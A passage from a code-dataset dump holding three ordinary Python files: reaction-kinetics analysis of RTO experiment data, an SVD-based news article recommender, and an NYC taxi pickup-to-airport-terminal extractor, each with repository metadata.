self.O2_con_in = []\n        INTERPNUM = 200\n        \n        for hr in self.heating_rates:\n            print('Loading heating rate {}...'.format(hr))\n            # Read RTO data\n            ydict = load_rto_data(os.path.join(self.dataset_dir, str(hr)+'C_min'))\n            \n            # Downsample and append\n            time_downsampled = 
np.linspace(ydict['Time'].min(), ydict['Time'].max(), num=INTERPNUM)\n            Temp_ds = np.interp(time_downsampled, ydict['Time'], ydict['Temp'])\n            O2_consumption_ds = np.interp(time_downsampled, ydict['Time'], ydict['O2_consumption']/100)\n            CO2_production_ds = np.interp(time_downsampled, ydict['Time'], ydict['CO2_production']/100)\n\n            self.heating_data[hr] = {'Time': time_downsampled, 'Temp': Temp_ds, 'O2': O2_consumption_ds, 'CO2': CO2_production_ds, 'O2_con_in': ydict['O2_con_in']/100}\n\n    \n    def print_curves(self, save_path = None):\n\n        plt.figure()\n        for hr in sorted(self.heating_data.keys()):\n            plt.plot(self.heating_data[hr]['Time'], self.heating_data[hr]['O2'])\n        plt.xlabel('Time [min]')\n        plt.ylabel('O2 consumption [% mol]')\n        plt.title('O2 consumption for experiments')\n        plt.legend([str(hr) for hr in sorted(self.heating_data.keys())])\n\n        if isinstance(save_path, str):\n            plt.savefig(save_path[:-4] + '_consumption' + save_path[-4:])\n        else:\n            plt.show()\n\n        plt.figure()\n        for hr in sorted(self.heating_data.keys()):\n            plt.plot(self.heating_data[hr]['Time'], self.heating_data[hr]['Temp'])\n        plt.xlabel('Time [min]')\n        plt.ylabel('Temperature [C]')\n        plt.title('Temperature profiles for experiments')\n        plt.legend([str(hr) for hr in sorted(self.heating_data.keys())])\n\n        if isinstance(save_path, str):\n            plt.savefig(save_path[:-4] + '_temperature' + save_path[-4:])\n        else:\n            plt.show()\n\n\n    def get_heating_data(self):\n        \n        '''\n        Get dictionary of times and temperature data.\n\n        '''\n        hr_dict = {}\n        for hr in self.heating_rates:\n            data = self.heating_data[hr]\n            hr_dict[hr] = {'Time': data['Time'], 'Temp': data['Temp']}\n        \n        return hr_dict\n\n\n    def get_initial_condition(self, species, hr):\n        '''\n        Query initial conditions based on the heating rate and the species. 
\n\n '''\n \n if species == 'O2':\n return self.O2_con_in[self.heating_rates.index(hr)]\n elif species == 'Oil':\n return self.Oil_con_init\n elif species == 'T':\n return self.heating_data[hr]['Temp'][0]\n else:\n return 0.0\n \n \n def print_isoconversional_curves(self, save_path=None, corrected = False):\n conv_grid, O2_eact, O2_rorder, O2_preexp = isoconversional_analysis(self.heating_data, corrected=corrected)\n \n plt.figure()\n plt.plot(conv_grid, O2_eact)\n plt.xlabel('O2 conversion [% mol]')\n plt.ylabel('Activation energy [J/mol]]')\n plt.title('O2 activation energy')\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_O2_eact' + save_path[-4:])\n else:\n plt.show()\n \n plt.figure()\n plt.plot(conv_grid, O2_rorder)\n plt.xlabel('O2 conversion [% mol]')\n plt.ylabel('Reaction Order')\n plt.title('O2 conversion reaction order')\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_O2_rorder' + save_path[-4:])\n else:\n plt.show()\n \n plt.figure()\n plt.plot(conv_grid, np.exp(O2_preexp))\n plt.xlabel('O2 conversion [% mol]')\n plt.ylabel('Pre-exponential factor')\n plt.title('O2 conversion pre-exponential factor')\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_O2_preexp' + save_path[-4:])\n else:\n plt.show()\n \n\n def compute_kinetics_params(self, num_rxns, return_labels=False):\n \n conv_grid, O2_eact, _, O2_preexp = isoconversional_analysis(self.heating_data, corrected=True)\n \n conv_grid_fit = (conv_grid - np.mean(conv_grid)) / np.std(conv_grid)\n O2_eact_fit = (O2_eact - np.mean(O2_eact)) / np.std(O2_eact)\n \n labels = SpectralClustering(n_clusters=num_rxns, affinity='nearest_neighbors', n_neighbors=10).fit_predict(np.concatenate((np.expand_dims(conv_grid_fit,1), \n np.expand_dims(O2_eact_fit,1)),axis=1))\n \n # Transform labels to be ascending order of conversion value\n mean_convs = [np.mean(np.array(conv_grid)[labels==i]) for i in range(num_rxns)]\n label_sort_inds = sorted(range(num_rxns),key=mean_convs.__getitem__)\n labels = [label_sort_inds.index(l) for l in labels]\n \n act_eng = [np.mean(np.array(O2_eact)[np.equal(labels,i)]) for i in range(num_rxns)]\n pre_exp = [np.exp(np.mean(np.array(O2_preexp)[np.equal(labels,i)])) for i in range(num_rxns)]\n \n if return_labels:\n return pre_exp, act_eng, labels\n else:\n return pre_exp, act_eng\n \n \n def print_isoconversional_overlay(self, num_rxns=None, save_path=None):\n \n if num_rxns is None:\n raise Exception('Must enter number of oxygenated reactions.')\n \n conv_grid, O2_eact, _, _ = isoconversional_analysis(self.heating_data, corrected=True)\n _, e_acts, labels = self.compute_kinetics_params(num_rxns, return_labels=True)\n \n plt.figure()\n plt.plot(conv_grid, O2_eact)\n plt.xlabel('O2 conversion [% mol]')\n plt.ylabel('Activation energy [J/mol]]')\n plt.title('O2 activation energy')\n \n for i in range(num_rxns):\n convs = np.array(conv_grid)[np.equal(labels,i)]\n eacts = e_acts[i]*np.ones_like(convs)\n plt.scatter(convs, eacts)\n \n plt.legend(['Observed Activation Energy']+['Reaction {}'.format(i+1) for i in range(num_rxns)])\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_isconversional_overlay' + save_path[-4:])\n \n plt.show()\n\n\n def compute_bounds(self, param_types, log_params=True):\n '''\n Compute bounds for each parameter based on the data\n\n '''\n _, O2_eact, _, O2_preexp = isoconversional_analysis(self.heating_data, corrected=True)\n\n eact_min = np.maximum(np.amin(O2_eact), 1e3)\n eact_max = np.minimum(np.amax(O2_eact), 
1e6)\n\n preexp_min = np.maximum(np.amin(np.exp(O2_preexp)), 1e-2)\n preexp_max = np.minimum(np.amax(np.exp(O2_preexp)), 1e3)\n\n if log_params:\n eact_min, eact_max = np.log(eact_min)-1, np.log(eact_max)+1\n preexp_min, preexp_max = np.log(preexp_min), np.log(preexp_max)\n\n bnds = []\n\n for p in param_types:\n if p[0] == 'acteng':\n bnds.append((eact_min, eact_max))\n elif p[0] == 'preexp':\n bnds.append((preexp_min, preexp_max))\n elif p[0] == 'stoic':\n bnds.append((1e-2, 50))\n\n\n return bnds\n \n \n def compute_initial_guess(self, reac_names, prod_names, res, param_types, log_params=True):\n '''\n Inputs:\n reac_names - list of reactant names for every reaction\n prod_names - list of product names for every reaction\n res - function res(x) that computes the sum of squared residuals from an input parameter vector x\n param_types - list of parameter types \n log_params - if log of pre-exponential factors and activation energy being used\n \n Returns: \n x0 - initial guess for the parameters vector\n \n '''\n \n # Initialize parameter vector\n x0 = np.ones((len(param_types)))\n num_rxns = len(reac_names)\n \n # Begin building initial guess for pre-exponential factor and activation energies\n oxy_rxns= [i for i, r in enumerate(reac_names) if 'O2' in r]\n num_oxy_rxns = len(oxy_rxns)\n \n # Get guesses for oxygen-containing reactions\n pre_exp, act_engs = self.compute_kinetics_params(num_oxy_rxns)\n \n # Get distance scores for each reaction\n fuel_names = []\n comp_names = list(set([comp for reac_prod in reac_names+prod_names for comp in reac_prod]))\n for c in comp_names:\n if len(c)>=3:\n if c[:3]=='Oil':\n fuel_names.append(c)\n if len(c)>=4:\n if c[:4]=='Coke':\n fuel_names.append(c)\n \n # Build fuel graph\n G = nx.Graph()\n G.add_nodes_from(fuel_names)\n G.add_edge('Oil', 'Oil')\n\n fuel_set = set(fuel_names)\n for i in range(num_rxns):\n reac_fuels = list(fuel_set.intersection(set(reac_names[i])))\n prod_fuels = list(fuel_set.intersection(set(prod_names[i])))\n for f1 in reac_fuels:\n for f2 in prod_fuels:\n G.add_edge(f1, f2)\n \n # Get shortest path between Oil and fuels\n shortest_fuel_paths = {}\n for f in fuel_names:\n shortest_fuel_paths[f] = nx.shortest_path_length(G, source='Oil', target=f)\n \n reaction_path_lengths = {}\n for i, r in enumerate(reac_names):\n for s in r: # Note: relies on only one fuel per reaction\n if s in fuel_names:\n reaction_path_lengths[i] = shortest_fuel_paths[s]\n \n # Gather path lengths associated with each oxygen-containing reaction\n oxy_path_lengths = [reaction_path_lengths[i] for i in oxy_rxns]\n \n # Reaction index to nearest oxygen-containing reaction\n rounded_path_inds = [min(range(len(oxy_rxns)), key=lambda x: abs(reaction_path_lengths[i]-oxy_path_lengths[x])) for i in range(num_rxns)]\n \n # Compile pre-exponential factor and activation energy \n pre_exps_all = [pre_exp[rounded_path_inds[i]] for i in range(num_rxns)]\n act_engs_all = [act_engs[rounded_path_inds[i]] for i in range(num_rxns)]\n \n if log_params:\n pre_exps_all = [np.log(A) for A in pre_exps_all]\n act_engs_all = [np.log(E) for E in act_engs_all]\n\n bnds=[]\n for i, p in enumerate(param_types):\n if p[0] =='preexp':\n x0[i] = pre_exps_all[p[1]]\n bnds.append((-np.inf, np.inf))\n elif p[0] == 'acteng':\n x0[i] = act_engs_all[p[1]]\n bnds.append((-np.inf, np.inf))\n else:\n bnds.append((0, np.inf))\n \n # Find coefficients that minimize the residual (i.e. 
physical reaction)\n sol = minimize(res, x0, bounds=bnds)\n x0 = sol.x # assign initial guess as vector that creates physical reaction\n \n return x0", "repo_name": "suetri-a/ISC-Kinetics", "sub_path": "Kinetics-Model-Optimizer/data/rto_data.py", "file_name": "rto_data.py", "file_ext": "py", "file_size_in_byte": 15480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_excel", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 41, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 58, "usage_type": "call"}, {"api_name": "base_data.BaseData", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 157, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 165, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "utils.utils.isoconversional_analysis", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.show", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 238, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 245, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 245, "usage_type": "name"}, {"api_name": "utils.utils.isoconversional_analysis", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 253, "usage_type": "call"}, {"api_name": "sklearn.cluster.SpectralClustering", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 264, "usage_type": "call"}, {"api_name": "utils.utils.isoconversional_analysis", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
284, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 289, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "utils.utils.isoconversional_analysis", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 345, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 367, "usage_type": "call"}, {"api_name": "networkx.shortest_path_length", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 408, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 411, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 413, "usage_type": "attribute"}, {"api_name": "scipy.optimize.minimize", "line_number": 416, "usage_type": "call"}]} +{"seq_id": "12883184273", "text": "#0. Packages import\nimport pandas as pd\nimport os\nimport math\nimport surprise\n\nfrom collections import defaultdict\n\nfrom surprise import Reader, Dataset\nfrom surprise import SVD, dump\n\n \n#1. Loading Metadata Dataset\nmeta_df= pd.read_csv(\"./news-portal-user-interactions-by-globocom/articles_metadata.csv\")\n\n\n#2. 
Loading and regrouping clicks files together\nif not os.path.exists('./news-portal-user-interactions-by-globocom/clicks_sum.csv'):\n file_dir = \"./news-portal-user-interactions-by-globocom/clicks\"\n file_path_list = sorted(\n [\n os.path.join(file_dir, file_name) \n for file_name in os.listdir(file_dir)\n if file_name.endswith(\".csv\")\n ]\n )\n \n file_df_list = []\n \n for file_path in file_path_list:\n df = pd.read_csv(file_path)\n file_df_list.append(df)\n \n clicks_sum = pd.concat(file_df_list, ignore_index=True)\n clicks_sum.to_csv('./news-portal-user-interactions-by-globocom/clicks_sum.csv')\nelse:\n clicks_sum = pd.read_csv('./news-portal-user-interactions-by-globocom/clicks_sum.csv')\n\n# 3. Filtering the data down to the columns needed\nfiltered_data = clicks_sum.merge(meta_df,\n left_on='click_article_id',\n right_on='article_id')[[\"user_id\",\n \"article_id\",\n \"category_id\",\n \"session_size\"]]\n \n# Function to spread the rating properly\ndef smooth_user_preference(x):\n return math.log(1+x, 2) \n \n#4. Applying the log function to the rating\nrating_cat_log = filtered_data.groupby([\"user_id\", \"article_id\"])[\"session_size\"].sum()\\\n .apply(smooth_user_preference).reset_index()\n\n#5. Using the Surprise package\n# Initializing the Surprise reader\nreader = Reader(rating_scale=(1, 10))\n\n# Creating the Surprise Dataset\ndata = Dataset.load_from_df(rating_cat_log[[\"user_id\", \"article_id\", \"session_size\"]],\n reader)\n\n# Split the dataset into train and test sets\ntrainset, testset = surprise.model_selection.train_test_split(data, test_size=0.25, random_state=0)\n\n#6. Choose and train the algorithm\n\n# Choose the prediction algorithm (matrix factorization SVD here)\nalgo_best = SVD(n_epochs=20, lr_all=0.01, reg_all=0.4)\n\n# Fit the algorithm\nalgo_best.fit(trainset)\n\n# Compute predictions of the 'original' algorithm.\npredictions = algo_best.test(testset)\n\n# Dump predictions for future use in the API\nfile_name = os.path.expanduser(\"dump_file\") # create the dump file if it does not exist\ndump.dump(file_name,\n predictions=predictions,\n )\n\nfile_name = os.path.expanduser(\"dump_file\")\nloaded_predictions, loaded_algo = dump.load(file_name)\n\n\n# Function from https://surprise.readthedocs.io/en/stable/FAQ.html\ndef get_top_n(predictions, n=5):\n \"\"\"Return the top-N recommendation for each user from a set of predictions.\n\n Args:\n predictions(list of Prediction objects): The list of predictions, as\n returned by the test method of an algorithm.\n n(int): The number of recommendations to output for each user. Default\n is 5.\n\n Returns:\n A dict where keys are user (raw) ids and values are lists of tuples:\n [(raw item id, rating estimation), ...] of size n.\n \"\"\"\n\n # First map the predictions to each user.\n top_n = defaultdict(list)\n \n for uid, iid, true_r, est, _ in predictions:\n top_n[uid].append((iid, est))\n\n # Then sort the predictions for each user and retrieve the n highest ones.\n for uid, user_ratings in top_n.items():\n user_ratings.sort(key=lambda x: x[1], reverse=True)\n top_n[uid] = user_ratings[:n]\n\n return top_n\n\n# Function to display the result. 
To be changed according to the API display\ndef recommend(user_id, num):\n print(\"Recommending \" + str(num) + \" articles to user \" + str(user_id) + \"...\") \n print(\"-------\")\n top_n = get_top_n(loaded_predictions, num) \n recs = top_n[user_id][:num] \n for rec in recs: \n print(\"Recommended: \" + str(rec[0]) + \" (score:\" + str(rec[1]) + \")\")\n\n# Testing out the script\n# recommend(10000,5)", "repo_name": "AmauryLecoq/Article_recommendation_app", "sub_path": "Script_model/collaborative_filtering.py", "file_name": "collaborative_filtering.py", "file_ext": "py", "file_size_in_byte": 4141, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "math.log", "line_number": 49, "usage_type": "call"}, {"api_name": "surprise.Reader", "line_number": 57, "usage_type": "call"}, {"api_name": "surprise.Dataset.load_from_df", "line_number": 60, "usage_type": "call"}, {"api_name": "surprise.Dataset", "line_number": 60, "usage_type": "name"}, {"api_name": "surprise.model_selection.train_test_split", "line_number": 64, "usage_type": "call"}, {"api_name": "surprise.model_selection", "line_number": 64, "usage_type": "attribute"}, {"api_name": "surprise.SVD", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "surprise.dump.dump", "line_number": 79, "usage_type": "call"}, {"api_name": "surprise.dump", "line_number": 79, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "surprise.dump.load", "line_number": 84, "usage_type": "call"}, {"api_name": "surprise.dump", "line_number": 84, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "25999220884", "text": "#!/usr/bin/env python\nimport glob\nimport csv\nfrom math import radians, cos, sin, asin, sqrt\nfrom datetime import datetime\n\nREAD_KEYS = (\n 'vendor_id', 'rate_code', 'pickup_datetime',\n 'trip_time_in_secs', 'passenger_count',\n 'pickup_longitude', 'pickup_latitude',\n 'dropoff_longitude', 'dropoff_latitude',\n)\n\nWRITE_KEYS = READ_KEYS + (\n 'terminal',\n)\n\nTERMINALS = (\n ('JFKT1', 100, 40.643190, -73.789867),\n ('JFKT23', 100, 40.641530, -73.787875),\n ('JFKT4', 100, 40.644429, -73.782924),\n ('JFKT5', 100, 40.645795, -73.776379),\n ('JFKT7', 100, 40.648586, -73.782909),\n ('JFKT8', 100, 40.646870, -73.789999),\n ('LGAA', 70, 40.773130, -73.885406),\n ('LGAB', 50, 40.774210, -73.872263),\n ('LGAC', 40, 40.771111, -73.865579),\n ('LGAD', 30, 40.768477, -73.862196),\n # ('EWR A', 100, 40.687819, -74.182653),\n # ('EWR B', 100, 40.690580, -74.177597),\n # ('EWR C', 100, 40.695255, 
-74.177720),\n)\n\n\ndef haversine(lon1, lat1, lon2, lat2):\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n\n From: http://stackoverflow.com/q/4913349/438838\n \"\"\"\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n\n # 6367 km is the radius of the Earth\n meters = 6367 * 1000 * c\n return meters\n\n\ndef get_nearest(cab_data):\n pickup_lat = float(cab_data['pickup_latitude'])\n pickup_lng = float(cab_data['pickup_longitude'])\n nearest = min((haversine(pickup_lng, pickup_lat, lng, lat), terminal)\n for terminal, rng, lat, lng in TERMINALS)\n return {'terminal': nearest[1]}\n\n\ndef format_date(dt):\n date = datetime.strptime(dt, '%m/%d/%y %H:%M')\n return date.strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef extract_data(path):\n with open(path, 'r') as f:\n reader = csv.DictReader(f)\n for row in reader:\n data = {k: row[k] for k in READ_KEYS}\n data['pickup_datetime'] = format_date(data['pickup_datetime'])\n data.update(get_nearest(data))\n yield data\n\n\ndef process_csv_files():\n with open('data.csv', 'w+') as f:\n writer = csv.DictWriter(f, WRITE_KEYS)\n writer.writeheader()\n for path in glob.glob('csvs/*'):\n rows = extract_data(path)\n writer.writerows(rows)\n\n\nif __name__ == '__main__':\n process_csv_files()\n", "repo_name": "dheerosaur/nyc-holiday-taxi-viz", "sub_path": "bin/extract.py", "file_name": "extract.py", "file_ext": "py", "file_size_in_byte": 2567, "program_lang": 